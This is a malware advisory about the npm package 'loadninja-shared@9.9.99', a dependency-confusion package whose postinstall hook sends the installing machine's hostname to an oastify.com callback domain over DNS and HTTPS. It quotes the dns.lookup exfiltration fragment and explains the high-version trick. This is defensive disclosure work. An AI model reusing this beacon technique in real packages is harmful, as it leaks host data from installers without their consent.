loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node beacon.js", which fires automatically on npm install. beacon.js reads os.hostname() and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domain tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com (Burp Collaborator infrastructure) over both a DNS lookup (dns.lookup(NONCE + '.' + host63 + '.' + HOST,...)) and an HTTPS POST. The version 9.9.99 is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.

The OpenSSF Package Analysis project identified 'loadninja-shared' @ 9.9.99 (npm) as malicious.

It is considered malicious because:

• The package communicates with a domain associated with malicious activity.